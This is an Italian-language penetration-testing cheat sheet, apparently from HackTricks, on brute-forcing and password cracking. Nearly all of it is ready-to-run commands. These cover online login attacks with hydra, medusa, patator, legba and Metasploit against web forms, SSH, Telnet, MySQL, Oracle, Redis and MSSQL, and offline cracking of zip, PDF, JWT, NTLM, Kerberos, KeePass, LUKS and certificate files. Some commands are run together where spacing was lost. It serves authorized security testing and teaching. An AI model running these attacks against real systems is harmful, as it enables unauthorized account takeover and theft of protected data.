Trova quante più informazioni possibile sul target e genera un dizionario personalizzato. Strumenti che possono aiutare:
Crunch
crunch460123456789ABCDEF-ocrunch1.txt#From length 4 to 6 using that alphabetcrunch44-f/usr/share/crunch/charset.lstmixalpha# Only length 4 using charset mixalpha (inside file charset.lst)@Lowercasealphacharacters,Uppercasealphacharacters%Numericcharacters^Specialcharactersincludingspaccrunch68-t,@@^^%%
Uno strumento generatore di wordlist, che ti consente di fornire un insieme di parole, offrendoti la possibilità di creare più variazioni dalle parole fornite, creando una wordlist unica e ideale da utilizzare per un target specifico.
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst domain.htb http-post-form "/path/index.php:name=^USER^&password=^PASS^&enter=Sign+in:Login name or password is incorrect" -V
# Use https-post-form mode for https
Per https devi cambiare da "http-post-form" a "https-post-form"
HTTP - CMS -- (W)ordpress, (J)oomla o (D)rupal o (M)oodle
cmsmap-fW/J/D/M-ua-pahttps://wordpress.com# Check also https://github.com/evilsocket/legba/wiki/HTTP
# hydrahydra-Lusernames.txt-Ppass.txt<IP>mysql# msfconsolemsf> useauxiliary/scanner/mysql/mysql_login; setVERBOSEfalse# medusamedusa -h <IP/Host> -u <username> -P <password_list> <-f | to stop medusa on first success attempt> -t <threads> -M mysql
#Legbalegbamysql--usernameroot--passwordwordlists/passwords.txt--targetlocalhost:3306
OracleSQL
patator oracle_login sid=<SID> host=<IP> user=FILE0 password=FILE1 0=users-oracle.txt 1=pass-oracle.txt -x ignore:code=ORA-01017
./odat.pypasswordguesser-s $SERVER -d $SID./odat.pypasswordguesser-s $MYSERVER -p $PORT --accounts-fileaccounts_multiple.txt#msf1msf> useadmin/oracle/oracle_loginmsf> setRHOSTS<IP>msf> setRPORT1521msf> setSID<SID>#msf2, this option uses nmap and it fails sometimes for some reasonmsf> usescanner/oracle/oracle_loginmsf> setRHOSTS<IP>msf> setRPORTS1521msf> setSID<SID>#for some reason nmap fails sometimes when executing this scriptnmap--scriptoracle-brute-p1521--script-argsoracle-brute.sid=<SID><IP>legbaoracle--targetlocalhost:1521--oracle-databaseSYSTEM--usernameadmin--passworddata/passwords.txt
Per utilizzare oracle_login con patator è necessario installare:
msf> useauxiliary/scanner/redis/redis_loginnmap--scriptredis-brute-p6379<IP>hydra–P/path/pass.txtredis://<IP>:<PORT># 6379 is the defaultlegbaredis--targetlocalhost:6379--usernameadmin--passworddata/passwords.txt [--redis-ssl]
legbasftp--usernameadmin--passwordwordlists/passwords.txt--targetlocalhost:22# Try keys from a folderlegbasftp--usernameadmin--password'@/some/path/*'--ssh-auth-modekey--targetlocalhost:22
#Use the NetBIOS name of the machine as domaincrackmapexecmssql<IP>-d<DomainName>-uusernames.txt-ppasswords.txthydra-L/root/Desktop/user.txt–P/root/Desktop/pass.txt<IP>mssqlmedusa-h<IP>–U/root/Desktop/user.txt–P/root/Desktop/pass.txt–Mmssqlnmap -p 1433 --script ms-sql-brute --script-args mssql.domain=DOMAIN,userdb=customuser.txt,passdb=custompass.txt,ms-sql-brute.brute-windows-accounts <host> #Use domain if needed. Be careful with the number of passwords in the list, this could block accounts
msf> use auxiliary/scanner/mssql/mssql_login #Be careful, you can block accounts. If you have a domain set it and use USE_WINDOWS_ATHENT
SSH
hydra-lroot-Ppasswords.txt [-t 32]<IP>sshncrack-p22--userroot-Ppasswords.txt<IP> [-T 5]medusa-uroot-P500-worst-passwords.txt-h<IP>-Msshpatator ssh_login host=<ip> port=22 user=root 0=/path/passwords.txt password=FILE0 -x ignore:mesg='Authentication failed'
legbassh--usernameadmin--passwordwordlists/passwords.txt--targetlocalhost:22# Try keys from a folderlegbassh--usernameadmin--password'@/some/path/*'--ssh-auth-modekey--targetlocalhost:22
Chiavi SSH deboli / PRNG prevedibile di Debian
Alcuni sistemi presentano difetti noti nel seme casuale utilizzato per generare materiale crittografico. Questo può comportare una riduzione drammatica dello spazio delle chiavi che può essere bruteforced con strumenti come snowdroppe/ssh-keybrute. Sono disponibili anche set pre-generati di chiavi deboli come g0tmi1k/debian-ssh.
STOMP (ActiveMQ, RabbitMQ, HornetQ e OpenMQ)
Il protocollo di testo STOMP è un protocollo di messaggistica ampiamente utilizzato che consente comunicazioni e interazioni senza soluzione di continuità con i popolari servizi di messaggistica come RabbitMQ, ActiveMQ, HornetQ e OpenMQ. Fornisce un approccio standardizzato ed efficiente per scambiare messaggi e svolgere varie operazioni di messaggistica.
hydra-lroot-Ppasswords.txt [-t 32]<IP>telnetncrack-p23--userroot-Ppasswords.txt<IP> [-T 5]medusa-uroot-P500-worst-passwords.txt-h<IP>-Mtelnetlegbatelnet \--username admin \--password wordlists/passwords.txt \--target localhost:23 \--telnet-user-prompt "login: " \--telnet-pass-prompt "Password: " \--telnet-prompt ":~$ " \--single-match # this option will stop the program when the first valid pair of credentials will be found, can be used with any plugin
#$zip2$*0*3*0*a56cb83812be3981ce2a83c581e4bc4f*4d7b*24*9af41ff662c29dfff13229eefad9a9043df07f2550b9ad7dfc7601f1a9e789b5ca402468*694b6ebb6067308bedcd*$/zip2$
hashcat.exe -m 13600 -a 0 .\hashzip.txt .\wordlists\rockyou.txt
.\hashcat.exe -m 13600 -i -a 0 .\hashzip.txt #Incremental attack
Known plaintext zip attack
Devi conoscere il plaintext (o parte del plaintext) di un file contenuto all'interno dello zip crittografato. Puoi controllare i nomi dei file e la dimensione dei file contenuti all'interno di uno zip crittografato eseguendo: 7z l encrypted.zip
Scarica bkcrackdalla pagina delle release.
# You need to create a zip file containing only the file that is inside the encrypted zip
zip plaintext.zip plaintext.file
./bkcrack -C <encrypted.zip> -c <plaintext.file> -P <plaintext.zip> -p <plaintext.file>
# Now wait, this should print a key such as 7b549874 ebc25ec5 7e465e18
# With that key you can create a new zip file with the content of encrypted.zip
# but with a different pass that you set (so you can decrypt it)
./bkcrack -C <encrypted.zip> -k 7b549874 ebc25ec5 7e465e18 -U unlocked.zip new_pwd
unzip unlocked.zip #User new_pwd as password
7z
cat /usr/share/wordlists/rockyou.txt | 7za t backup.7z
#Download and install requirements for 7z2john
wget https://raw.githubusercontent.com/magnumripper/JohnTheRipper/bleeding-jumbo/run/7z2john.pl
apt-get install libcompress-raw-lzma-perl
./7z2john.pl file.7z > 7zhash.john
PDF
apt-get install pdfcrack
pdfcrack encrypted.pdf -w /usr/share/wordlists/rockyou.txt
#pdf2john didn't work well, john didn't know which hash type was
# To permanently decrypt the pdf
sudo apt-get install qpdf
qpdf --password=<PASSWORD> --decrypt encrypted.pdf plaintext.pdf
git clone https://github.com/Sjord/jwtcrack.git
cd jwtcrack
#Bruteforce using crackjwt.py
python crackjwt.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc /usr/share/wordlists/rockyou.txt
#Bruteforce using john
python jwt2john.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc > jwt.john
john jwt.john #It does not work with Kali-John
Cracking NTLM
Format:USUARIO:ID:HASH_LM:HASH_NT:::
john --wordlist=/usr/share/wordlists/rockyou.txt --format=NT file_NTLM.hashes
hashcat -a 0 -m 1000 --username file_NTLM.hashes /usr/share/wordlists/rockyou.txt --potfile-path salida_NT.pot
Keepass
sudo apt-get install -y kpcli #Install keepass tools like keepass2john
keepass2john file.kdbx > hash #The keepass is only using password
keepass2john -k <file-password> file.kdbx > hash # The keepass is also using a file as a needed credential
#The keepass can use a password and/or a file as credentials, if it is using both you need to provide them to keepass2john
john --wordlist=/usr/share/wordlists/rockyou.txt hash
Keberoasting
john --format=krb5tgs --wordlist=passwords_kerb.txt hashes.kerberoast
hashcat -m 13100 --force -a 0 hashes.kerberoast passwords_kerb.txt
./tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi
bruteforce-luks -f ./list.txt ./backup.img
cryptsetup luksOpen backup.img mylucksopen
ls /dev/mapper/ #You should find here the image mylucksopen
mount /dev/mapper/mylucksopen /mnt
Metodo 2
cryptsetup luksDump backup.img #Check that the payload offset is set to 4096
dd if=backup.img of=luckshash bs=512 count=4097 #Payload offset +1
hashcat -m 14600 -a 0 luckshash wordlists/rockyou.txt
cryptsetup luksOpen backup.img mylucksopen
ls /dev/mapper/ #You should find here the image mylucksopen
mount /dev/mapper/mylucksopen /mnt
#John hash format
<USERNAME>:$mysqlna$<CHALLENGE>*<RESPONSE>
dbuser:$mysqlna$112233445566778899aabbccddeeff1122334455*73def07da6fba5dcc1b19c918dbd998e0d1f3f9d
Chiave privata PGP/GPG
gpg2john private_pgp.key #This will generate the hash and save it in a file
john --wordlist=/usr/share/wordlists/rockyou.txt ./hash
Se hai un file xlsx con una colonna protetta da una password, puoi rimuovere la protezione:
Caricalo su google drive e la password verrà rimossa automaticamente
Per rimuoverlamanualmente:
unzip file.xlsx
grep -R "sheetProtection" ./*
# Find something like: <sheetProtection algorithmName="SHA-512"
hashValue="hFq32ZstMEekuneGzHEfxeBZh3hnmO9nvv8qVHV8Ux+t+39/22E3pfr8aSuXISfrRV9UVfNEzidgv+Uvf8C5Tg" saltValue="U9oZfaVCkz5jWdhs9AA8nA" spinCount="100000" sheet="1" objects="1" scenarios="1"/>
# Remove that line and rezip the file
zip -r file.xls .
Certificati PFX
# From https://github.com/Ridter/p12tool
./p12tool crack -c staff.pfx -f /usr/share/wordlists/rockyou.txt
# From https://github.com/crackpkcs12/crackpkcs12
crackpkcs12 -d /usr/share/wordlists/rockyou.txt ./cert.pfx
Usa Trickest per costruire e automatizzare flussi di lavoro facilmente, alimentati dagli strumenti della comunità più avanzati al mondo.
Ottieni accesso oggi:
hashcat.exe -a 0 -m 1000 C:\Temp\ntlm.txt .\rockyou.txt -r rules\best64.rule
Attacco combinatore di wordlist
È possibile combinare 2 wordlist in 1 con hashcat.
Se la lista 1 conteneva la parola "hello" e la seconda conteneva 2 righe con le parole "world" e "earth". Le parole helloworld e helloearth verranno generate.
# This will combine 2 wordlists
hashcat.exe -a 1 -m 1000 C:\Temp\ntlm.txt .\wordlist1.txt .\wordlist2.txt
# Same attack as before but adding chars in the newly generated words
# In the previous example this will generate:
## hello-world!
## hello-earth!
hashcat.exe -a 1 -m 1000 C:\Temp\ntlm.txt .\wordlist1.txt .\wordlist2.txt -j $- -k $!
Attacco a maschera (-a 3)
# Mask attack with simple mask
hashcat.exe -a 3 -m 1000 C:\Temp\ntlm.txt ?u?l?l?l?l?l?l?l?d
hashcat --help #will show the charsets and are as follows
? | Charset
===+=========
l | abcdefghijklmnopqrstuvwxyz
u | ABCDEFGHIJKLMNOPQRSTUVWXYZ
d | 0123456789
h | 0123456789abcdef
H | 0123456789ABCDEF
s | !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
a | ?l?u?d?s
b | 0x00 - 0xff
# Mask attack declaring custom charset
hashcat.exe -a 3 -m 1000 C:\Temp\ntlm.txt -1 ?d?s ?u?l?l?l?l?l?l?l?1
## -1 ?d?s defines a custom charset (digits and specials).
## ?u?l?l?l?l?l?l?l?1 is the mask, where "?1" is the custom charset.
# Mask attack with variable password length
## Create a file called masks.hcmask with this content:
?d?s,?u?l?l?l?l?1
?d?s,?u?l?l?l?l?l?1
?d?s,?u?l?l?l?l?l?l?1
?d?s,?u?l?l?l?l?l?l?l?1
?d?s,?u?l?l?l?l?l?l?l?l?1
## Use it to crack the password
hashcat.exe -a 3 -m 1000 C:\Temp\ntlm.txt .\masks.hcmask
# Mask numbers will be appended to each word in the wordlist
hashcat.exe -a 6 -m 1000 C:\Temp\ntlm.txt \wordlist.txt ?d?d?d?d
# Mask numbers will be prepended to each word in the wordlist
hashcat.exe -a 7 -m 1000 C:\Temp\ntlm.txt ?d?d?d?d \wordlist.txt
HackTricks Training AWS Red Team Expert (ARTE)
HackTricks Training GCP Red Team Expert (GRTE)
